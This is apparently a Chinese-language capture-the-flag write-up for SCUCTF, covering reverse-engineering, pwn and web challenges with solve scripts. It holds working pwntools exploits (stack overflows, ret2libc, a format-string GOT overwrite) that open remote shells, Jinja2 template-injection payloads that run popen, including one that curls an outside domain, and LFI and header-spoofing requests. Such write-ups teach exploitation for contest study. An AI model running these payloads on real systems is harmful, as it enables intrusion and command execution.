s.add(1 * flag[0] + 50 * flag[1] + 59 * flag[2] + 85 * flag[3] + 14 * flag[4] + 89 * flag[5] + 12 * flag[6] + 64 * flag[7] + 1 * flag[8] + 49 * flag[9] + 97 * flag[10] + 8 * flag[11] + 11 * flag[12] + 59 * flag[13] + 40 * flag[14] + 13 * flag[15] + 73 * flag[16] + 82 * flag[17] + 98 * flag[18] + 50 * flag[19] + 43 * flag[20] + 70 * flag[21] + 93 * flag[22] + 5 * flag[23] + 7 * flag[24] == 123563)
s.add(83 * flag[0] + 41 * flag[1] + 15 * flag[2] + 86 * flag[3] + 1 * flag[4] + 18 * flag[5] + 7 * flag[6] + 93 * flag[7] + 72 * flag[8] + 49 * flag[9] + 48 * flag[10] + 26 * flag[11] + 83 * flag[12] + 70 * flag[13] + 18 * flag[14] + 28 * flag[15] + 32 * flag[16] + 77 * flag[17] + 81 * flag[18] + 5 * flag[19] + 61 * flag[20] + 8 * flag[21] + 98 * flag[22] + 94 * flag[23] + 22 * flag[24] == 125124)
s.add(40 * flag[0] + 63 * flag[1] + 90 * flag[2] + 28 * flag[3] + 52 * flag[4] + 79 * flag[5] + 21 * flag[6] + 77 * flag[7] + 86 * flag[8] + 91 * flag[9] + 50 * flag[10] + 95 * flag[11] + 82 * flag[12] + 30 * flag[13] + 60 * flag[14] + 2 * flag[15] + 97 * flag[16] + 33 * flag[17] + 11 * flag[18] + 30 * flag[19] + 64 * flag[20] + 40 * flag[21] + 4 * flag[22] + 2 * flag[23] + 1 * flag[24] == 126844)
s.add(61 * flag[0] + 9 * flag[1] + 36 * flag[2] + 17 * flag[3] + 13 * flag[4] + 53 * flag[5] + 96 * flag[6] + 41 * flag[7] + 28 * flag[8] + 63 * flag[9] + 20 * flag[10] + 4 * flag[11] + 71 * flag[12] + 99 * flag[13] + 37 * flag[14] + 2 * flag[15] + 58 * flag[16] + 38 * flag[17] + 75 * flag[18] + 29 * flag[19] + 34 * flag[20] + 66 * flag[21] + 82 * flag[22] + 39 * flag[23] + 50 * flag[24] == 116479)
s.add(51 * flag[0] + 56 * flag[1] + 13 * flag[2] + 6 * flag[3] + 80 * flag[4] + 8 * flag[5] + 99 * flag[6] + 76 * flag[7] + 14 * flag[8] + 32 * flag[9] + 99 * flag[10] + 7 * flag[11] + 27 * flag[12] + 32 * flag[13] + 20 * flag[14] + 23 * flag[15] + 79 * flag[16] + 89 * flag[17] + 54 * flag[18] + 78 * flag[19] + 23 * flag[20] + 89 * flag[21] + 96 * flag[22] + 85 * flag[23] + 94 * flag[24] == 139277)
s.add(3 * flag[0] + 17 * flag[1] + 78 * flag[2] + 6 * flag[3] + 75 * flag[4] + 18 * flag[5] + 29 * flag[6] + 1 * flag[7] + 49 * flag[8] + 8 * flag[9] + 90 * flag[10] + 60 * flag[11] + 62 * flag[12] + 13 * flag[13] + 16 * flag[14] + 87 * flag[15] + 38 * flag[16] + 71 * flag[17] + 39 * flag[18] + 12 * flag[19] + 47 * flag[20] + 7 * flag[21] + 54 * flag[22] + 83 * flag[23] + 64 * flag[24] == 109760)
s.add(58 * flag[0] + 1 * flag[1] + 51 * flag[2] + 94 * flag[3] + 69 * flag[4] + 86 * flag[5] + 45 * flag[6] + 14 * flag[7] + 23 * flag[8] + 4 * flag[9] + 25 * flag[10] + 9 * flag[11] + 72 * flag[12] + 85 * flag[13] + 35 * flag[14] + 39 * flag[15] + 92 * flag[16] + 43 * flag[17] + 19 * flag[18] + 26 * flag[19] + 76 * flag[20] + 55 * flag[21] + 52 * flag[22] + 59 * flag[23] + 24 * flag[24] == 121674)

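# Solve, print the raw model, then decode the flag in byte order.
a = s.check()
print(a)
result = s.model()
print(result)
# Index the model by each BitVec itself: an int index selects the i-th
# declaration in the model's unordered listing (and there are only 25
# variables, so range(26) overran it). as_long() gives the byte value.
for var in flag:
    print(chr(result[var].as_long()), end="")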
# result = [18 = 118,
# 20 = 114,
# 24 = 121,
# 2 = 108,
# 12 = 97,
# 13 = 110,
# 3 = 111,
# 10 = 104,
# 15 = 85,
# 17 = 105,
# 7 = 83,
# 16 = 110,
# 21 = 115,
# 23 = 116,
# 5 = 101,
# 14 = 95,
# 22 = 105,
# 9 = 99,
# 6 = 95,
# 11 = 117,
# 1 = 95,
# 19 = 101,
# 8 = 105,
# 0 = 73,
# 4 = 118]
# print(result)

Tower of Hanoi

Upx脱壳一下,ida反编译,

1668743439139

异或回去即可

DEBUG

Ida反编译后发现代码为对一个字符串30次随机两个位置交换,gdb看一下随机数

Gdb发现进去后会RE,patch掉即可

ez_logic

Ida反编译后发现由许多setjmp和longjmp组成,发现算法为相邻两个一组做区间加法,并且区间有序,差分后从前到后匹配即可

RE_签到

ida反编译一下

1668743450870

找到flag

ez_base

ida反编译后,仔细阅读发现就是一张的地图上有一些可以走的点,要求每个点只走一次且按“马”的方式走从,BFS即可

ez_vm

ida反编译后,已知一个操作列表,逐步完成操作

经分析:

Case 0:把栈顶两个数相加

Case 1:把栈顶两个数相减

Case 2:把栈顶两个数相异或

Case 3:把栈顶两个数相比较

Case 4,5,6:为比较后的跳转

Case 7:对栈顶的数在另一个数组中下标转值

Case 8:改写数组

Case 9:向栈里加一个数

Case 10:Wrong

Case 11:Right

Case 12:跳转

令另一个数组为Str[]

发现一些结构如

9 A 9 B 8 -> str[B]=A
9 A 9 100 8
9 100 7 9 lim 3
5 loop1
...
9 1 9 100 7 0 9 100 8
C loop2
是一个循环
for(i=A;i<lim;i++) {
...
}

发现流程由三个循环和一些赋值组成,且代码由Str[100]作为循环的i

分析一下三个循环中分别为

/* The three loops recovered from the VM opcode stream (Str[] is the data
   array; Str[100] serves as the loop counter in the bytecode). */
/* pass 1: replace each of the first 25 bytes by its XOR with the next byte */
for(int i=0;i<25;i++) Str[i]=Str[i]^Str[i+1]
/* pass 2: fold the previous byte (minus the index) into the next one */
for(int i=0;i<24;i++) Str[i+1]+=Str[i]-i
/* final check: Str[1..24] must equal Str[50..73] byte for byte */
{for(int i=1;i<25;i++) if(Str[i]!=Str[i+49]) return wrong; return right;}

爆破一下Str[0],倒着做即可

ez_unity

先找到核心代码文件 .\XuhanYilun_Data\Managed\Assembly-CSharp.dll

用ILSpy反编译,在项目中找到GameManager.cs

打开GameManager.cs ,在 Update函数中发现这样一段

1668743471088

把这一段去掉后重新编译成dll替换掉原来的Assembly-CSharp.dll

这样人物就不会死亡了

ez_xxx

一眼SMC

patch掉反调试部分后dump出内存,分析内存数据。

1668737764534

写出exp

# Bytes dumped from the self-modifying code region; each is decoded to one
# flag character by XORing with 0x28 and subtracting 4.
target = [0x7E,0x1F,0x43,0x5E,0x1F,0x50,0x4B,0x45,0x5F,0x4B,0x4D,0x5A,0x4B,0x44,0x5B,0x5A,0x41,0x5F,0x50,0x4B,0x42,0x5E,0x45,0x41,0x5A,0x40,0x58,0x55,0x4B,0x4D,0x5A,0x40,0x4B,0x5F,0x45,0x5A,0x43,0x58,0x41,0x4B,0x59,0x4D,0x5A]

decoded = "".join(chr((byte ^ 0x28) - 4) for byte in target)
print(decoded, end="")

ez_dp

使用pyinstxtractor工具分解出pyc

1668737938823

猜测函数主逻辑位于 t4.pyc,反编译。

import wx, wx.xrc, random

class MyDialog1(wx.Dialog):
    """Decompiled challenge dialog: an endless addition quiz.

    The flag is produced only after 9999999 correct answers with no
    mistakes (see ``tj``); ``get_flag`` then counts the recursive paths of
    ``gogogo`` from 0 to >= 100 in steps of 1 or 2, which the writeup
    identifies as a Fibonacci number.
    """
    # Operands of the displayed sum; replaced after every submission.
    x = 123
    y = 321
    # tot: answers submitted so far; zq: answers that matched x + y.
    tot = 0
    zq = 0
    # Path counter incremented by gogogo().
    flag = 0

    def __init__(self, parent):
        """Build the dialog: question label, answer box, submit button, status label."""
        wx.Dialog.__init__(self, parent, id=(wx.ID_ANY), title=(wx.EmptyString), pos=(wx.DefaultPosition), size=(wx.Size(400, 200)), style=(wx.DEFAULT_DIALOG_STYLE))
        self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize)
        bSizer1 = wx.BoxSizer(wx.VERTICAL)
        self.m_staticText1 = wx.StaticText(self, wx.ID_ANY, '123+321', wx.DefaultPosition, wx.DefaultSize, 0)
        self.m_staticText1.Wrap(-1)
        self.m_staticText1.SetFont(wx.Font(36, 70, 90, 90, False, '宋体'))
        bSizer1.Add(self.m_staticText1, 0, wx.ALL, 5)
        self.m_textCtrl1 = wx.TextCtrl(self, wx.ID_ANY, '在此输入您的答案', wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER)
        bSizer1.Add(self.m_textCtrl1, 0, wx.ALL, 5)
        self.m_button2 = wx.Button(self, wx.ID_ANY, '提交', wx.DefaultPosition, wx.DefaultSize, 0)
        bSizer1.Add(self.m_button2, 0, wx.ALL, 5)
        self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, '做出9999999道加法题,而且准确率为100%就给你flag', wx.DefaultPosition, wx.DefaultSize, 0)
        self.m_staticText2.Wrap(-1)
        bSizer1.Add(self.m_staticText2, 0, wx.ALL, 5)
        self.SetSizer(bSizer1)
        self.Layout()
        self.Centre(wx.BOTH)
        # Both Enter in the text box and the button submit via tj().
        self.m_textCtrl1.Bind(wx.EVT_TEXT_ENTER, self.tj)
        self.m_button2.Bind(wx.EVT_BUTTON, self.tj)

    def __del__(self):
        pass

    def gogogo(self, x):
        """Walk from ``x`` to >= 100 in steps of 1 or 2, bumping ``flag`` once per path.

        Plain recursion with no memoisation: the call count equals the
        number of paths, which grows exponentially, so running it directly
        is impractical.
        """
        if x >= 100:
            self.flag += 1
            return
        self.gogogo(x + 1)
        self.gogogo(x + 2)

    def get_flag(self):
        """Return the number of gogogo() paths from 0, accumulated in ``flag``."""
        self.gogogo(0)
        return self.flag

    def tj(self, event):
        """Grade a submitted answer, update the counters and the status label.

        The submitted text is passed to ``eval``, so any expression typed
        into the box runs inside the process (arbitrary code execution; here
        it is part of the challenge). Success, mismatch and exception each
        set a different label; after 9999999 flawless answers the flag is
        computed and shown. A fresh random x, y pair is then displayed.
        """
        self.tot += 1
        ans = self.m_textCtrl1.Value
        try:
            # eval on user-controlled input: executes whatever was typed.
            if eval(ans) == self.x + self.y:
                self.zq += 1
                self.m_staticText2.Label = '答案正确 正确率:' + str(self.zq) + '/' + str(self.tot)
            else:
                self.m_staticText2.Label = '答案错误 正确率:' + str(self.zq) + '/' + str(self.tot)
        except:
            self.m_staticText2.Label = '未知错误 正确率:' + str(self.zq) + '/' + str(self.tot)
        else:
            # Only a perfect record (zq == tot) at the threshold yields the flag.
            if self.zq >= 9999999:
                if self.zq == self.tot:
                    a = self.get_flag()
                    self.m_staticText2.Label = 'scuctf{' + str(a) + '}'
        self.m_textCtrl1.Value = ''
        self.x = random.choice(range(1000))
        self.y = random.choice(range(1000))
        self.m_staticText1.Label = str(self.x) + '+' + str(self.y)


# Entry point: create the wx application, show the dialog and run the event loop.
app = wx.App(False)
zjm = MyDialog1(None)
zjm.Show(True)
app.MainLoop()

发现是斐波那契数列。

ez_android

用 JADX 分析 apk,函数主逻辑位于 `com.example.check.MainActivity`

package com.example.check;

import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import androidx.appcompat.app.AppCompatActivity;
import com.example.check.databinding.ActivityMainBinding;

/* loaded from: classes.dex */
/**
 * Decompiled entry activity of the ez_android challenge (package
 * com.example.check). Seven buttons share one click counter; two of them
 * append bits to a string that the native library "check" validates, and the
 * flag is derived from that string's hashCode(). Indentation was restored
 * from the flattened listing.
 */
public class MainActivity extends AppCompatActivity {
    private ActivityMainBinding binding;
    // Total presses across all seven buttons (see update()).
    private int click_times = 0;
    // Bit string built by click3 ('0') and click5 ('1'); checked by click7.
    private String string = new String();
    private TextView textView;

    // Implemented in libcheck.so; click7 treats a return of 0 as "accepted".
    public native int check_s(String str);

    public native String stringFromJNI();

    static {
        System.loadLibrary("check");
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
        this.binding = inflate;
        setContentView(inflate.getRoot());
        this.textView = (TextView) findViewById(R.id.textView2);
        // Each button gets an anonymous listener that forwards to clickN().
        ((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.1
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click1();
            }
        });
        ((Button) findViewById(R.id.button2)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.2
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click2();
            }
        });
        ((Button) findViewById(R.id.button3)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.3
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click3();
            }
        });
        ((Button) findViewById(R.id.button4)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.4
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click4();
            }
        });
        ((Button) findViewById(R.id.button5)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.5
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click5();
            }
        });
        ((Button) findViewById(R.id.button6)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.6
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click6();
            }
        });
        ((Button) findViewById(R.id.button7)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.7
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click7();
            }
        });
    }

    /** Bumps the click counter and refreshes the status text. */
    private void update() {
        int i = this.click_times + 1;
        this.click_times = i;
        // A fixed string is shown after 1000 clicks. The writeup's flag comes
        // from the click7 path instead, so this one looks like a decoy.
        if (i >= 1000) {
            this.textView.setText("scuctf{I_do_not_like_Android}");
        } else {
            this.textView.setText("你已经点击" + String.valueOf(this.click_times) + "次,加油!");
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click1() {
        update();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click2() {
        update();
    }

    /* JADX INFO: Access modifiers changed from: private */
    // Appends a '0' bit.
    public void click3() {
        update();
        this.string += '0';
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click4() {
        update();
    }

    /* JADX INFO: Access modifiers changed from: private */
    // Appends a '1' bit.
    public void click5() {
        update();
        this.string += '1';
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click6() {
        update();
    }

    /* JADX INFO: Access modifiers changed from: private */
    // Validates the bit string natively and, on success, prints the flag.
    public void click7() {
        update();
        if (check_s(this.string) == 0) {
            this.textView.setText("nice");
            String str = new String();
            String str2 = new String();
            // Decimal digits of the hash, least significant first. Java's %
            // keeps the sign of the dividend, so a negative hashCode produces
            // "-d" fragments through String.valueOf(); the solve script copies
            // this loop verbatim rather than re-deriving the digits.
            for (int hashCode = this.string.hashCode(); hashCode != 0; hashCode /= 10) {
                str = str + String.valueOf(hashCode % 10);
            }
            // Every character of that digit string is replaced by its ASCII code.
            for (int i = 0; i < str.length(); i++) {
                str2 = str2 + String.valueOf((int) str.charAt(i));
            }
            this.textView.setText("scuctf{" + str2 + "}");
        }
    }
}

基本逻辑:通过 click3 和 click5 生成一串 01 串,再调用 native 层函数 check_s 检验。

1668743496720

找到判断函数后,发现它依次解析二进制串并返回表中对应的字符;把 flag 中的字符按该表映射成二进制后拼起来即可。

exp

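/**
 * Rebuilds the ez_android flag from the accepted bit string by replaying the
 * transformation MainActivity.click7() performs on it.
 */
public class android {

    /**
     * Applies click7()'s two passes to {@code input}: the decimal digits of
     * {@code input.hashCode()} are collected least-significant first, then
     * every character of that digit string is replaced by its ASCII code.
     *
     * @param input the bit string the app accepted
     * @return the flag body (empty when the hash is 0, e.g. for "")
     */
    static String encode(String input) {
        StringBuilder digits = new StringBuilder();
        // Copied from the app: Java's % keeps the dividend's sign, so a negative
        // hash contributes "-d" fragments here, exactly as on the device.
        for (int hashCode = input.hashCode(); hashCode != 0; hashCode /= 10) {
            digits.append(hashCode % 10);
        }
        StringBuilder codes = new StringBuilder();
        for (int i = 0; i < digits.length(); i++) {
            codes.append((int) digits.charAt(i));
        }
        return codes.toString();
    }

    public static void main(String[] args) {
        String string = "111110010001111100001001111111101111010111111110110111111101000001001001011100111111101111110111111100011111000111111100001111100100011111000010011111110000111110011100010000010100110000000111111101000110101111111111101111100111100100000010111001111100111111111111001000111110000100111111110111101011111111011011111111101010000001111110111111000101011111110101011111101111100011111111010010000001010011001100011111001111111101101111111000001011011010010100101111111010010100010001111100011111111111110010100110000010100010111001100";
        // The raw hash is printed first, as in the original script.
        System.out.println(string.hashCode());
        System.out.println("scuctf{" + encode(string) + "}");
    }
}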

PWN

2048_game

测试2048水平?(雾

test_your_nc

nc & cat flag即可。

ret2text

# ret2text: stack overflow in a 32-bit binary. The input overruns a fixed
# buffer and the saved return address is replaced with an address already in
# the binary, so no shellcode is needed. A stack canary and a length-bounded
# read are what stop this class of bug.
from pwn import *
elf = ELF("ret2text")   # loaded but not used below
# 32 + 4 + 4 bytes of padding put the next 4 bytes on the saved return
# address (offsets presumably worked out in a debugger).
payload = b"A" * (32 + 4 + 4)
# 0x08049256: the in-binary address control is redirected to; the writeup
# does not say what is there — confirm in the disassembly.
payload += p32(0x08049256)
sh = remote("114.117.187.56", 10002)
sh.sendline(payload)
sh.interactive()

ret2shellcode

# ret2shellcode: two inputs. The first carries shellcode; the second overflows
# the stack so the saved return address points at where the first input was
# stored. This only works when that region is executable — NX (plus PIE/ASLR
# for the fixed address) is the mitigation.
from pwn import *
context(arch = "amd64", os = "linux")
sh = remote("114.117.187.56", 10003)
sh.recv()
# pwntools' stock /bin/sh shellcode for the arch set above.
sh.sendline(asm(shellcraft.sh()))
sh.recv()
# 32-byte buffer + 8 bytes of saved rbp, then the return address. 0x4040A0 is
# presumably the global buffer holding the first input — confirm in the binary.
sh.sendline(b"A" * (32 + 8) + p64(0x4040A0))
sh.interactive()

ret2libc

# ret2libc in two stages against a non-PIE x86-64 binary (main and gadget
# addresses are hard-coded). Stage 1 overflows the stack to call
# puts(puts@got), leaking puts' runtime address, and returns to main for a
# second input. Stage 2 uses the leak to locate system and "/bin/sh" in libc.
# PIE, full RELRO and a stack canary each break one of these steps.
from pwn import *
from LibcSearcher import *
context(log_level = "debug")
context.terminal = ["konsole", "-e"]
elf = ELF("ret2libc")
elf_puts_got = elf.got["puts"]
elf_puts_plt = elf.plt["puts"]
# The two __libc_start_main values and pop_rsi_pop_r15_ret are not used below.
__libc_start_main_got = elf.got["__libc_start_main"]
__libc_start_main_symb = elf.symbols["__libc_start_main"]
main_symb = 0x4010F0
pop_rdi_ret = 0x401333
pop_rsi_pop_r15_ret = 0x401331
ret = 0x40101a

# sh = process("./ret2libc")
sh = remote("114.117.187.56", "10007")
# gdb.attach(sh)
# Stage 1 chain: 32-byte buffer + saved rbp, then pop rdi; puts@got; puts@plt; main.
payload1 = b"A" * (32 + 8) + p64(pop_rdi_ret)
payload1 += p64(elf_puts_got)
payload1 += p64(elf_puts_plt)
payload1 += p64(main_symb)
sh.recv()
sh.sendline(payload1)
# print(leaked_puts_str)
# Read up to the "\nDo" that begins the program's next prompt; the leaked
# pointer sits between one leading byte (dropped by [1:]) and that marker.
leaked_puts_str = sh.recvuntil(b"\nDo")# .rjust(b"\x00")
sh.recv()
# print(leaked_puts_str)
# puts() stops at the first NUL, so the (typically 6) significant bytes of
# the address are padded back to 8 before unpacking.
puts_real = (u64(leaked_puts_str[1:-3].ljust(8, b"\x00")))
print(hex(puts_real))
# Identify the remote libc build from the leaked puts address.
searcher = LibcSearcher("puts", puts_real)
# searcher.select_libc(6)
# print(searcher)
libc_base = puts_real - searcher.dump("puts")
# Stage 2 chain: pop rdi; "/bin/sh"; ret; system.
payload2 = b"A" * (32 + 8) + p64(pop_rdi_ret)
str_bin_sh = searcher.dump("str_bin_sh") + libc_base
payload2 += p64(str_bin_sh)
# print(str_bin_sh)
system_sh = searcher.dump("system") + libc_base
# system_sh = puts_real
# print(hex(system_sh))
# The extra `ret` presumably keeps the stack 16-byte aligned at the call into
# system, as the x86-64 ABI expects.
payload2 += p64(ret)
payload2 += p64(system_sh)
# print(payload2)
# payload2 += p64(main_symb)
sh.sendline(payload2)
# sh.recv()
sh.interactive()

fmt

# fmt: format-string bug — the program passes user input to printf() as the
# format. Two "%7$08s" reads leak GOT entries (printf dereferences the pointer
# appended right after the format as its 7th argument and prints the bytes it
# finds there), LibcSearcher turns the leaks into libc's base, and a
# pwntools-built write payload then overwrites printf's GOT entry with
# system, so the next input ("/bin/sh") is passed to system() instead of
# printf(). Full RELRO (read-only GOT) and a constant format string are the
# fixes. The triple-quoted blocks at the end are the author's debugging notes.
from pwn import *
from LibcSearcher import *
context(log_level = "debug", terminal = ["konsole", "-e"], arch = "amd64")
# sh = process("./fmt")
# gdb.attach(sh)

sh = remote("114.117.187.56", "10004")
elf = ELF("./fmt")
libc = ELF("./libc.so.6")   # loaded but not used; LibcSearcher does the lookup
# sh.recv()
# Leak 1: __libc_start_main@got. "BB" marks where the leaked bytes end.
payload_leak = b"%7$08sBB"
payload_leak += p64(elf.got["__libc_start_main"])
sh.recv()
sh.sendline(payload_leak)
leaked_libc_start_main = sh.recvuntil(b"BB")
# [2:-2] drops two leading bytes (presumably echoed output — confirm) and the
# "BB" marker; the short address is padded back to 8 bytes.
leaked_libc_start_main = u64(leaked_libc_start_main[2:-2].ljust(8, b"\x00"))
libc_s = LibcSearcher("__libc_start_main", leaked_libc_start_main)

printf_got = elf.got["printf"]

# Leak 2: puts@got, used as a second constraint to pin down the libc build.
payload_leak2 = b"%7$08sBB"
payload_leak2 += p64(elf.got["puts"])
sh.recv()
sh.sendline(payload_leak2)
sh.recv()
leaked_puts = sh.recvuntil(b"BB")
leaked_puts = u64(leaked_puts[2:-2].ljust(8, b"\x00"))
print(leaked_puts)
libc_s.add_condition("puts", leaked_puts)
libc_s.select_libc(0)
# print(libc_s.dump("str_bin_sh"))
libc_base = leaked_libc_start_main - libc_s.dump("__libc_start_main")
system_addr = libc_s.dump("system") + libc_base
printf_addr = libc_s.dump("printf") + libc_base   # computed but unused
# strncmp_addr = elf.got["strncmp"]

print(hex(printf_got))
print(hex(system_addr))
# print(hex(printf_addr))
# print(hex(system_addr % (16 ** 8)))
# 6 is the printf argument index at which the input buffer starts (the
# commented-out variant with 7 suggests it was tuned by hand).
payload = fmtstr_payload(6, {printf_got : system_addr})
# payload = "%"
# payload = fmtstr_payload(7, {printf_got:system_addr})
print(len(payload))
sh.sendline(payload)
sh.recv()
# From here on printf(input) is really system(input).
sh.sendline(b"/bin/sh")
sh.interactive()

'''
in 1st case
0x7f47e26a0c90
0x7f47e2691290

other

0x7f97d4037c90
0x7f97d4028290

0x7f70c6c4dc90
0x7f70c6c3e290
'''
# Only reached after the interactive session ends.
sh.recv()

'''
0x70 0x17 0xfd 0x1d 0x7e 0x7f 0x00 0x00
0x00007f7e1dfd1770
70 1

0x404038 <printf@got.plt>: 0x70 0x97 0xb2 0x9b 0xa0 0x7f 0x00 0x00
0x404040 <alarm@got.plt>: 0xa0 0xc1 0xba 0x9b 0xa0 0x7f 0x00 0x00
0x404048 <read@got.plt>: 0x00 0x10 0xbd 0x9b 0xa0 0x7f 0x00 0x00
0x404050 <signal@got.plt>: 0x80 0x28 0xb1 0x9b 0xa0 0x7f 0x00 0x00
0x7fa09bb233d0
0x7fa09bb29770
0x00007fa09bb29770
<printf@got.plt>: 0x70 0x97 0xb2 0x9b 0xa0 0x7f 0x00 0x00

<printf@got.plt>: 0x00007ff660ecd770 0x00007ff660f501a0
'''

Web

CheckIn

数组绕过hash函数

# CheckIn: the "array bypass" of a PHP hash comparison. Sending a[] / b[]
# turns both parameters into arrays; on PHP 7 and earlier md5()/sha1() return
# NULL (with a warning) for a non-string argument, so two different inputs
# compare equal after hashing. Server-side fix: reject anything that is not a
# string (is_string()) before hashing.
import requests
url = "http://114.117.187.56:11000/"
# a[] goes in the query string and b[] in the POST body, presumably matching
# where the challenge reads each parameter ($_GET vs $_POST).
r = requests.post(url, params = {"a[]" : 1}, data = {"b[]" : 2})
print(r.text)

Include

伪协议读取 flag.php

# Include: local file inclusion through the `file` parameter. The php://filter
# wrapper returns flag.php base64-encoded instead of executing it, so its
# source (flag included) comes back as text. Fix: include only from a
# whitelist of filenames instead of passing user input to include().
import requests
from base64 import *
url = "http://114.117.187.56:11002/"
# http://114.117.187.56:11002/?file=php://filter/read=convert.base64-encode/resource=flag.php
# Sent as POST with the parameter in the query string; same effect as the GET above.
r = requests.post(url, params = {"file" : r"php://filter/read=convert.base64-encode/resource=flag.php"})
# print(r.text)
# The literal is the base64 body copied from the response; decoding it prints
# flag.php's source.
print(b64decode(b"PD9waHANCiRmbGFnID0gJ3NjdWN0Zns2YWZmNWE3N2JhNjg1ODY1MTVhYTViMGE5YTFiZTVhMn0nOw=="))

easy_flask

首先爆破出Popen在哪个subclasses中

# easy_flask, step 1: the `name` parameter is rendered as a Jinja2 template
# (SSTI). The payload walks ()->__class__->__base__->__subclasses__() and
# probes index i for an __init__.__globals__ that exposes popen; because the
# box has no outbound network, `sleep 50` is used as a timing/response side
# channel. Reversed attribute names ("__ssalc__"[::-1]) dodge a keyword
# filter. Fix: never build a template from user input — render a static
# template and pass the value as a variable (it is then autoescaped data).
import requests

# payload1 = '''{%print(().__getattribute__("__ssalc__"[::-1]).__getattribute__("__esab__"[::-1]).__getattribute__("__sessalcbus__"[::-1])['''
# payload2 = '''].__getattribute__("__tini__"[::-1]).__getattribute__("__slabolg__")['__buil'+'tins__']["ev" + "al"]("'''
# payload3 = '''"))%}'''
# {% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[139]|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]("curl tiger1218.com") == "chiv"%} a {% endif %}

payload1 = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())['''
payload2 = ''']|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]("sleep 50") == "chiv"%} a {% endif %}'''

# print(payload1 + payload2 + payload3)

# p
# Last response seen; starts as int 0, so the first iteration always prints.
tmp = 0

# Print every index whose response differs from the previous one; the
# writeup reports 139 here, while the next script uses 137 — subclass order
# depends on the interpreter build, so re-derive it per target.
for i in range(200):
    prams = {"name" : payload1 + str(i) + payload2}
    # print(prams["name"])
    req = requests.get("http://114.117.187.56:11003/view", params = prams)
    if(req.text != tmp):
        tmp = req.text
        print(i, req.text)

爆破出是第139个。

不能出网,盲注。

# easy_flask, step 2: blind, character-by-character extraction. The template
# compares one character of popen("cat /flag").read() (command spelled
# reversed, 'galf/ tac'[::-1]) with a guess and the page answers "Ok" or "NO".
# Same root cause and fix as step 1: user input must not become template source.
import requests
from string import printable

payload = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[137]|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]('galf/ tac'[::-1]).read()['''
# index = str(1)
payload2 = ''']=="'''
# char = chr(i)
payload3 = '''"%} a {% endif %}'''

# Up to 100 positions; every character is printed without a newline or
# flush, so the output may only appear when the script exits. Characters in
# printable such as '"' or '%' are not escaped and would corrupt the
# template — presumably they do not occur in the flag.
for index in range(100):
    flag = 1
    for char in printable:
        param = {"name" : payload + str(index) + payload2 + char + payload3}
        # print(param["name"])
        req = requests.get("http://114.117.187.56:11003/view", params = param)
        if req.text == "Ok":
            print(char, end = "")
            break
        elif req.text != "NO":
            # Unexpected response; flag is only recorded, never acted on,
            # because the early exit below stays commented out.
            flag = 0

    # if not flag:
    # break

JSJSJS

# JSJSJS: a bare POST to /api/flag with no body or headers returns the flag;
# the writeup gives no further detail. The base64 import is unused.
import requests
from base64 import *
url = "http://114.117.187.56:11005/api/flag"
r = requests.post(url)
print(r.text)

baby_ip

# baby_ip: the server decides "local" access from the X-Forwarded-For header,
# which is client-controlled unless it is set by a trusted reverse proxy — so
# spoofing 127.0.0.1 passes the check. The password is kept base64-encoded in
# the script. Fix: derive the client address from the connection (or from a
# header only when it comes from a known proxy), never from the raw header.
import requests
from base64 import *
url = "http://114.117.187.56:11004/"
r = requests.post(url, data={"password" : b64decode(b"aGdneXlkcw==")}, headers={"X-Forwarded-For": "127.0.0.1"})
print(r.text)

可爱的探针

# 可爱的探针: a leftover server-probe script (tz.php) exposes phpinfo() via
# act=phpinfo; the writeup greps the output for SCUCTF, so the flag is
# presumably in the environment or configuration phpinfo() dumps. Fix: remove
# diagnostic scripts from deployed sites. The base64 import is unused.
import requests
from base64 import *
url = "http://117.50.188.49:1145/tz.php"
r = requests.post(url, params={"act": "phpinfo"})
print(r.text)

python tmp_web.py | grep SCUCTF

真ikun进

view http://114.117.187.56:11006/js/game.js?s=4

// Starting fragment of the base64 flag; the remaining pieces are spliced in below.
let flag = "c23Rme22QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0=";
// NOTE: the `g` flag makes regex.test() stateful. A successful test advances
// regex.lastIndex past the match, the next test resumes from there and, when
// it finds nothing, returns false and resets lastIndex to 0. The four checks
// below therefore do not all pass, which is why the snippet has to be run
// rather than read.
const regex = /lgg/g;

// Insert `str` after the first `offset` characters of this string.
String.prototype.insetAt = function(str,offset){
